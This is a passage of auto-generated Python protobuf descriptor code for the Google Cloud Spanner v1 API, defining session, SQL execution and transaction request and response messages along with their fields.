\n\x1espanner.googleapis.com/Session"\x87\x01\n\x13ListSessionsRequest\x12\x39\n\x08\x64\x61tabase\x18\x01 \x01(\tB\'\xe0\x41\x02\xfa\x41!\n\x1fspanner.googleapis.com/Database\x12\x11\n\tpage_size\x18\x02 \x01(\x05\x12\x12\n\npage_token\x18\x03 \x01(\t\x12\x0e\n\x06\x66ilter\x18\x04 \x01(\t"]\n\x14ListSessionsResponse\x12,\n\x08sessions\x18\x01 \x03(\x0b\x32\x1a.google.spanner.v1.Session\x12\x17\n\x0fnext_page_token\x18\x02 \x01(\t"L\n\x14\x44\x65leteSessionRequest\x12\x34\n\x04name\x18\x01 \x01(\tB&\xe0\x41\x02\xfa\x41 \n\x1espanner.googleapis.com/Session"\x82\x05\n\x11\x45xecuteSqlRequest\x12\x37\n\x07session\x18\x01 \x01(\tB&\xe0\x41\x02\xfa\x41 \n\x1espanner.googleapis.com/Session\x12;\n\x0btransaction\x18\x02 \x01(\x0b\x32&.google.spanner.v1.TransactionSelector\x12\x10\n\x03sql\x18\x03 \x01(\tB\x03\xe0\x41\x02\x12\'\n\x06params\x18\x04 \x01(\x0b\x32\x17.google.protobuf.Struct\x12I\n\x0bparam_types\x18\x05 \x03(\x0b\x32\x34.google.spanner.v1.ExecuteSqlRequest.ParamTypesEntry\x12\x14\n\x0cresume_token\x18\x06 \x01(\x0c\x12\x42\n\nquery_mode\x18\x07 \x01(\x0e\x32..google.spanner.v1.ExecuteSqlRequest.QueryMode\x12\x17\n\x0fpartition_token\x18\x08 \x01(\x0c\x12\r\n\x05seqno\x18\t \x01(\x03\x12H\n\rquery_options\x18\n \x01(\x0b\x32\x31.google.spanner.v1.ExecuteSqlRequest.QueryOptions\x1a)\n\x0cQueryOptions\x12\x19\n\x11optimizer_version\x18\x01 \x01(\t\x1aJ\n\x0fParamTypesEntry\x12\x0b\n\x03key\x18\x01 \x01(\t\x12&\n\x05value\x18\x02 \x01(\x0b\x32\x17.google.spanner.v1.Type:\x02\x38\x01".\n\tQueryMode\x12\n\n\x06NORMAL\x10\x00\x12\x08\n\x04PLAN\x10\x01\x12\x0b\n\x07PROFILE\x10\x02"\xdf\x03\n\x16\x45xecuteBatchDmlRequest\x12\x37\n\x07session\x18\x01 \x01(\tB&\xe0\x41\x02\xfa\x41 \n\x1espanner.googleapis.com/Session\x12@\n\x0btransaction\x18\x02 \x01(\x0b\x32&.google.spanner.v1.TransactionSelectorB\x03\xe0\x41\x02\x12L\n\nstatements\x18\x03 \x03(\x0b\x32\x33.google.spanner.v1.ExecuteBatchDmlRequest.StatementB\x03\xe0\x41\x02\x12\x12\n\x05seqno\x18\x04 \x01(\x03\x42\x03\xe0\x41\x02\x1a\xe7\x01\n\tStatement\x12\x0b\n\x03sql\x18\x01 \x01(\t\x12\'\n\x06params\x18\x02 \x01(\x0b\x32\x17.google.protobuf.Struct\x12X\n\x0bparam_types\x18\x03 \x03(\x0b\x32\x43.google.spanner.v1.ExecuteBatchDmlRequest.Statement.ParamTypesEntry\x1aJ\n\x0fParamTypesEntry\x12\x0b\n\x03key\x18\x01 \x01(\t\x12&\n\x05value\x18\x02 \x01(\x0b\x32\x17.google.spanner.v1.Type:\x02\x38\x01"p\n\x17\x45xecuteBatchDmlResponse\x12\x31\n\x0bresult_sets\x18\x01 \x03(\x0b\x32\x1c.google.spanner.v1.ResultSet\x12"\n\x06status\x18\x02 \x01(\x0b\x32\x12.google.rpc.Status"H\n\x10PartitionOptions\x12\x1c\n\x14partition_size_bytes\x18\x01 \x01(\x03\x12\x16\n\x0emax_partitions\x18\x02 \x01(\x03"\xa3\x03\n\x15PartitionQueryRequest\x12\x37\n\x07session\x18\x01 \x01(\tB&\xe0\x41\x02\xfa\x41 \n\x1espanner.googleapis.com/Session\x12;\n\x0btransaction\x18\x02 \x01(\x0b\x32&.google.spanner.v1.TransactionSelector\x12\x10\n\x03sql\x18\x03 \x01(\tB\x03\xe0\x41\x02\x12\'\n\x06params\x18\x04 \x01(\x0b\x32\x17.google.protobuf.Struct\x12M\n\x0bparam_types\x18\x05 \x03(\x0b\x32\x38.google.spanner.v1.PartitionQueryRequest.ParamTypesEntry\x12>\n\x11partition_options\x18\x06 \x01(\x0b\x32#.google.spanner.v1.PartitionOptions\x1aJ\n\x0fParamTypesEntry\x12\x0b\n\x03key\x18\x01 \x01(\t\x12&\n\x05value\x18\x02 \x01(\x0b\x32\x17.google.spanner.v1.Type:\x02\x38\x01"\xb1\x02\n\x14PartitionReadRequest\x12\x37\n\x07session\x18\x01 \x01(\tB&\xe0\x41\x02\xfa\x41 \n\x1espanner.googleapis.com/Session\x12;\n\x0btransaction\x18\x02 \x01(\x0b\x32&.google.spanner.v1.TransactionSelector\x12\x12\n\x05table\x18\x03 \x01(\tB\x03\xe0\x41\x02\x12\r\n\x05index\x18\x04 \x01(\t\x12\x0f\n\x07\x63olumns\x18\x05 \x03(\t\x12/\n\x07key_set\x18\x06 \x01(\x0b\x32\x19.google.spanner.v1.KeySetB\x03\xe0\x41\x02\x12>\n\x11partition_options\x18\t \x01(\x0b\x32#.google.spanner.v1.PartitionOptions"$\n\tPartition\x12\x17\n\x0fpartition_token\x18\x01 \x01(\x0c"z\n\x11PartitionResponse\x12\x30\n\npartitions\x18\x01 \x03(\x0b\x32\x1c.google.spanner.v1.Partition\x12\x33\n\x0btransaction\x18\x02 \x01(\x0b\x32\x1e.google.spanner.v1.Transaction"\xab\x02\n\x0bReadRequest\x12\x37\n\x07session\x18\x01 \x01(\tB&\xe0\x41\x02\xfa\x41 \n\x1espanner.googleapis.com/Session\x12;\n\x0btransaction\x18\x02 \x01(\x0b\x32&.google.spanner.v1.TransactionSelector\x12\x12\n\x05table\x18\x03 \x01(\tB\x03\xe0\x41\x02\x12\r\n\x05index\x18\x04 \x01(\t\x12\x14\n\x07\x63olumns\x18\x05 \x03(\tB\x03\xe0\x41\x02\x12/\n\x07key_set\x18\x06 \x01(\x0b\x32\x19.google.spanner.v1.KeySetB\x03\xe0\x41\x02\x12\r\n\x05limit\x18\x08 \x01(\x03\x12\x14\n\x0cresume_token\x18\t \x01(\x0c\x12\x17\n\x0fpartition_token\x18\n \x01(\x0c"\x8f\x01\n\x17\x42\x65ginTransactionRequest\x12\x37\n\x07session\x18\x01 \x01(\tB&\xe0\x41\x02\xfa\x41 \n\x1espanner.googleapis.com/Session\x12;\n\x07options\x18\x02 \x01(\x0b\x32%.google.spanner.v1.TransactionOptionsB\x03\xe0\x41\x02"\xea\x01\n\rCommitRequest\x12\x37\n\x07session\x18\x01 \x01(\tB&\xe0\x41\x02\xfa\x41 \n\x1espanner.googleapis.com/Session\x12\x18\n\x0etransaction_id\x18\x02 \x01(\x0cH\x00\x12G\n\x16single_use_transaction\x18\x03 \x01(\x0b\x32%.google.spanner.v1.TransactionOptionsH\x00\x12.\n\tmutations\x18\x04 \x03(\x0b\x32\x1b.google.spanner.v1.MutationB\r\n\x0btransaction"F\n\x0e\x43ommitResponse\x12\x34\n\x10\x63ommit_timestamp\x18\x01 \x01(\x0b\x32\x1a.google.protobuf.Timestamp"g\n\x0fRollbackRequest\x12\x37\n\x07session\x18\x01 \x01(\tB&\xe0\x41\x02\xfa\x41 \n\x1espanner.googleapis.com/Session\x12\x1b\n\x0etransaction_id\x18\x02 \x01(\x0c\x42\x03\xe0\x41\x02\x32\xc0\x16\n\x07Spanner\x12\xa6\x01\n\rCreateSession\x12\'.google.spanner.v1.CreateSessionRequest\x1a\x1a.google.spanner.v1.Session"P\x82\xd3\xe4\x93\x02?":/v1/{database=projects/*/instances/*/databases/*}/sessions:\x01*\xda\x41\x08\x64\x61tabase\x12\xe0\x01\n\x13\x42\x61tchCreateSessions\x12-.google.spanner.v1.BatchCreateSessionsRequest\x1a..google.spanner.v1.BatchCreateSessionsResponse"j\x82\xd3\xe4\x93\x02K"F/v1/{database=projects/*/instances/*/databases/*}/sessions:batchCreate:\x01*\xda\x41\x16\x64\x61tabase,session_count\x12\x97\x01\n\nGetSession\x12$.google.spanner.v1.GetSessionRequest\x1a\x1a.google.spanner.v1.Session"G\x82\xd3\xe4\x93\x02:\x12\x38/v1/{name=projects/*/instances/*/databases/*/sessions/*}\xda\x41\x04name\x12\xae\x01\n\x0cListSessions\x12&.google.spanner.v1.ListSessionsRequest\x1a\'.google.spanner.v1.ListSessionsResponse"M\x82\xd3\xe4\x93\x02<\x12:/v1/{database=projects/*/instances/*/databases/*}/sessions\xda\x41\x08\x64\x61tabase\x12\x99\x01\n\rDeleteSession\x12\'.google.spanner.v1.DeleteSessionRequest\x1a\x16.google.protobuf.Empty"G\x82\xd3\xe4\x93\x02:*8/v1/{name=projects/*/instances/*/databases/*/sessions/*}\xda\x41\x04name\x12\xa3\x01\n\nExecuteSql\x12$.google.spanner.v1.ExecuteSqlRequest\x1a\x1c.google.spanner.v1.ResultSet"Q\x82\xd3\xe4\x93\x02K"F/v1/{session=projects/*/instances/*/databases/*/sessions/*}:executeSql:\x01*\x12\xbe\x01\n\x13\x45xecuteStreamingSql\x12$.google.spanner.v1.ExecuteSqlRequest\x1a#.google.spanner.v1.PartialResultSet"Z\x82\xd3\xe4\x93\x02T"O/v1/{session=projects/*/instances/*/databases/*/sessions/*}:executeStreamingSql:\x01*0\x01\x12\xc0\x01\n\x0f\x45xecuteBatchDml\x12).google.spanner.v1.ExecuteBatchDmlRequest\x1a*.google.spanner.v1.ExecuteBatchDmlResponse"V\x82\xd3\xe4\x93\x02P"K/v1/{session=projects/*/instances/*/databases/*/sessions/*}:executeBatchDml:\x01*\x12\x91\x01\n\x04Read\x12\x1e.google.spanner.v1.ReadRequest\x1a\x1c.google.spanner.v1.ResultSet"K\x82\xd3\xe4\x93\x02\x45"@/v1/{session=projects/*/instances/*/databases/*/sessions/*}:read:\x01*\x12\xac\x01\n\rStreamingRead\x12\x1e.google.spanner.v1.ReadRequest\x1a#.google.spanner.v1.PartialResultSet"T\x82\xd3\xe4\x93\x02N"I/v1/{session=projects/*/instances/*/databases/*/sessions/*}:streamingRead:\x01*0\x01\x12\xc9\x01\n\x10\x42\x65ginTransaction\x12*.google.spanner.v1.BeginTransactionRequest\x1a\x1e.google.spanner.v1.Transaction"i\x82\xd3\xe4\x93\x02Q"L/v1/{session=projects/*/instances/*/databases/*/sessions/*}:beginTransaction:\x01*\xda\x41\x0fsession,options\x12\xeb\x01\n\x06\x43ommit\x12 .google.spanner.v1.CommitRequest\x1a!.google.spanner.v1.CommitResponse"\x9b\x01\x82\xd3\xe4\x93\x02G"B/v1/{session=projects/*/instances/*/databases/*/sessions/*}:commit:\x01*\xda\x41 session,transaction_id,mutations\xda\x41(session,single_use_transaction,mutations\x12\xb0\x01\n\x08Rollback\x12".google.spanner.v1.RollbackRequest\x1a\x16.google.protobuf.Empty"h\x82\xd3\xe4\x93\x02I"D/v1/{session=projects/*/instances/*/databases/*/sessions/*}:rollback:\x01*\xda\x41\x16session,transaction_id\x12\xb7\x01\n\x0ePartitionQuery\x12(.google.spanner.v1.PartitionQueryRequest\x1a$.google.spanner.v1.PartitionResponse"U\x82\xd3\xe4\x93\x02O"J/v1/{session=projects/*/instances/*/databases/*/sessions/*}:partitionQuery:\x01*\x12\xb4\x01\n\rPartitionRead\x12\'.google.spanner.v1.PartitionReadRequest\x1a$.google.spanner.v1.PartitionResponse"T\x82\xd3\xe4\x93\x02N"I/v1/{session=projects/*/instances/*/databases/*/sessions/*}:partitionRead:\x01*\x1aw\xca\x41\x16spanner.googleapis.com\xd2\x41[https://www.googleapis.com/auth/cloud-platform,https://www.googleapis.com/auth/spanner.dataB\xf7\x01\n\x15\x63om.google.spanner.v1B\x0cSpannerProtoP\x01Z8google.golang.org/genproto/googleapis/spanner/v1;spanner\xaa\x02\x17Google.Cloud.Spanner.V1\xca\x02\x17Google\\Cloud\\Spanner\\V1\xea\x41_\n\x1fspanner.googleapis.com/Database\x12<projects/{project}/instances/{instance}/databases/{database}b\x06proto3'
),
dependencies=[
google_dot_api_dot_annotations__pb2.DESCRIPTOR,
google_dot_api_dot_client__pb2.DESCRIPTOR,
google_dot_api_dot_field__behavior__pb2.DESCRIPTOR,
google_dot_api_dot_resource__pb2.DESCRIPTOR,
google_dot_protobuf_dot_empty__pb2.DESCRIPTOR,
google_dot_protobuf_dot_struct__pb2.DESCRIPTOR,
google_dot_protobuf_dot_timestamp__pb2.DESCRIPTOR,
google_dot_rpc_dot_status__pb2.DESCRIPTOR,
google_dot_cloud_dot_spanner__v1_dot_proto_dot_keys__pb2.DESCRIPTOR,
google_dot_cloud_dot_spanner__v1_dot_proto_dot_mutation__pb2.DESCRIPTOR,
google_dot_cloud_dot_spanner__v1_dot_proto_dot_result__set__pb2.DESCRIPTOR,
google_dot_cloud_dot_spanner__v1_dot_proto_dot_transaction__pb2.DESCRIPTOR,
google_dot_cloud_dot_spanner__v1_dot_proto_dot_type__pb2.DESCRIPTOR,
],
)
_EXECUTESQLREQUEST_QUERYMODE = _descriptor.EnumDescriptor(
name="QueryMode",
full_name="google.spanner.v1.ExecuteSqlRequest.QueryMode",
filename=None,
file=DESCRIPTOR,
values=[
_descriptor.EnumValueDescriptor(
name="NORMAL", index=0, number=0, serialized_options=None, type=None
),
_descriptor.EnumValueDescriptor(
name="PLAN", index=1, number=1, serialized_options=None, type=None
),
_descriptor.EnumValueDescriptor(
name="PROFILE", index=2, number=2, serialized_options=None, type=None
),
],
containing_type=None,
serialized_options=None,
serialized_start=2243,
serialized_end=2289,
)
_sym_db.RegisterEnumDescriptor(_EXECUTESQLREQUEST_QUERYMODE)
_CREATESESSIONREQUEST = _descriptor.Descriptor(
name="CreateSessionRequest",
full_name="google.spanner.v1.CreateSessionRequest",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="database",
full_name="google.spanner.v1.CreateSessionRequest.database",
index=0,
number=1,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=_b(
"\340A\002\372A!\n\037spanner.googleapis.com/Database"
),
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="session",
full_name="google.spanner.v1.CreateSessionRequest.session",
index=1,
number=2,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=525,
serialized_end=651,
)
_BATCHCREATESESSIONSREQUEST = _descriptor.Descriptor(
name="BatchCreateSessionsRequest",
full_name="google.spanner.v1.BatchCreateSessionsRequest",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="database",
full_name="google.spanner.v1.BatchCreateSessionsRequest.database",
index=0,
number=1,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=_b(
"\340A\002\372A!\n\037spanner.googleapis.com/Database"
),
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="session_template",
full_name="google.spanner.v1.BatchCreateSessionsRequest.session_template",
index=1,
number=2,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="session_count",
full_name="google.spanner.v1.BatchCreateSessionsRequest.session_count",
index=2,
number=3,
type=5,
cpp_type=1,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=_b("\340A\002"),
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=654,
serialized_end=823,
)
_BATCHCREATESESSIONSRESPONSE = _descriptor.Descriptor(
name="BatchCreateSessionsResponse",
full_name="google.spanner.v1.BatchCreateSessionsResponse",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="session",
full_name="google.spanner.v1.BatchCreateSessionsResponse.session",
index=0,
number=1,
type=11,
cpp_type=10,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
)
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=825,
serialized_end=899,
)
_SESSION_LABELSENTRY = _descriptor.Descriptor(
name="LabelsEntry",
full_name="google.spanner.v1.Session.LabelsEntry",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="key",
full_name="google.spanner.v1.Session.LabelsEntry.key",
index=0,
number=1,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="value",
full_name="google.spanner.v1.Session.LabelsEntry.value",
index=1,
number=2,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=_b("8\001"),
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=1095,
serialized_end=1140,
)
_SESSION = _descriptor.Descriptor(
name="Session",
full_name="google.spanner.v1.Session",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="name",
full_name="google.spanner.v1.Session.name",
index=0,
number=1,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="labels",
full_name="google.spanner.v1.Session.labels",
index=1,
number=2,
type=11,
cpp_type=10,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="create_time",
full_name="google.spanner.v1.Session.create_time",
index=2,
number=3,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="approximate_last_use_time",
full_name="google.spanner.v1.Session.approximate_last_use_time",
index=3,
number=4,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[_SESSION_LABELSENTRY],
enum_types=[],
serialized_options=_b(
"\352Aq\n\036spanner.googleapis.com/Session\022Oprojects/{project}/instances/{instance}/databases/{database}/sessions/{session}"
),
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=902,
serialized_end=1258,
)
_GETSESSIONREQUEST = _descriptor.Descriptor(
name="GetSessionRequest",
full_name="google.spanner.v1.GetSessionRequest",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="name",
full_name="google.spanner.v1.GetSessionRequest.name",
index=0,
number=1,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=_b(
"\340A\002\372A \n\036spanner.googleapis.com/Session"
),
file=DESCRIPTOR,
)
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=1260,
serialized_end=1333,
)
_LISTSESSIONSREQUEST = _descriptor.Descriptor(
name="ListSessionsRequest",
full_name="google.spanner.v1.ListSessionsRequest",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="database",
full_name="google.spanner.v1.ListSessionsRequest.database",
index=0,
number=1,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=_b(
"\340A\002\372A!\n\037spanner.googleapis.com/Database"
),
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="page_size",
full_name="google.spanner.v1.ListSessionsRequest.page_size",
index=1,
number=2,
type=5,
cpp_type=1,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="page_token",
full_name="google.spanner.v1.ListSessionsRequest.page_token",
index=2,
number=3,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="filter",
full_name="google.spanner.v1.ListSessionsRequest.filter",
index=3,
number=4,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=1336,
serialized_end=1471,
)
_LISTSESSIONSRESPONSE = _descriptor.Descriptor(
name="ListSessionsResponse",
full_name="google.spanner.v1.ListSessionsResponse",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="sessions",
full_name="google.spanner.v1.ListSessionsResponse.sessions",
index=0,
number=1,
type=11,
cpp_type=10,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="next_page_token",
full_name="google.spanner.v1.ListSessionsResponse.next_page_token",
index=1,
number=2,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=1473,
serialized_end=1566,
)
_DELETESESSIONREQUEST = _descriptor.Descriptor(
name="DeleteSessionRequest",
full_name="google.spanner.v1.DeleteSessionRequest",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="name",
full_name="google.spanner.v1.DeleteSessionRequest.name",
index=0,
number=1,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=_b(
"\340A\002\372A \n\036spanner.googleapis.com/Session"
),
file=DESCRIPTOR,
)
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=1568,
serialized_end=1644,
)
_EXECUTESQLREQUEST_QUERYOPTIONS = _descriptor.Descriptor(
name="QueryOptions",
full_name="google.spanner.v1.ExecuteSqlRequest.QueryOptions",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="optimizer_version",
full_name="google.spanner.v1.ExecuteSqlRequest.QueryOptions.optimizer_version",
index=0,
number=1,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
)
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=2124,
serialized_end=2165,
)
_EXECUTESQLREQUEST_PARAMTYPESENTRY = _descriptor.Descriptor(
name="ParamTypesEntry",
full_name="google.spanner.v1.ExecuteSqlRequest.ParamTypesEntry",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="key",
full_name="google.spanner.v1.ExecuteSqlRequest.ParamTypesEntry.key",
index=0,
number=1,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="value",
full_name="google.spanner.v1.ExecuteSqlRequest.ParamTypesEntry.value",
index=1,
number=2,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=_b("8\001"),
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=2167,
serialized_end=2241,
)
_EXECUTESQLREQUEST = _descriptor.Descriptor(
name="ExecuteSqlRequest",
full_name="google.spanner.v1.ExecuteSqlRequest",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="session",
full_name="google.spanner.v1.ExecuteSqlRequest.session",
index=0,
number=1,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=_b(
"\340A\002\372A \n\036spanner.googleapis.com/Session"
),
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="transaction",
full_name="google.spanner.v1.ExecuteSqlRequest.transaction",
index=1,
number=2,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="sql",
full_name="google.spanner.v1.ExecuteSqlRequest.sql",
index=2,
number=3,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=_b("\340A\002"),
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="params",
full_name="google.spanner.v1.ExecuteSqlRequest.params",
index=3,
number=4,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="param_types",
full_name="google.spanner.v1.ExecuteSqlRequest.param_types",
index=4,
number=5,
type=11,
cpp_type=10,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="resume_token",
full_name="google.spanner.v1.ExecuteSqlRequest.resume_token",
index=5,
number=6,
type=12,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b(""),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="query_mode",
full_name="google.spanner.v1.ExecuteSqlRequest.query_mode",
index=6,
number=7,
type=14,
cpp_type=8,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="partition_token",
full_name="google.spanner.v1.ExecuteSqlRequest.partition_token",
index=7,
number=8,
type=12,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b(""),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="seqno",
full_name="google.spanner.v1.ExecuteSqlRequest.seqno",
index=8,
number=9,
type=3,
cpp_type=2,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="query_options",
full_name="google.spanner.v1.ExecuteSqlRequest.query_options",
index=9,
number=10,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[_EXECUTESQLREQUEST_QUERYOPTIONS, _EXECUTESQLREQUEST_PARAMTYPESENTRY],
enum_types=[_EXECUTESQLREQUEST_QUERYMODE],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=1647,
serialized_end=2289,
)
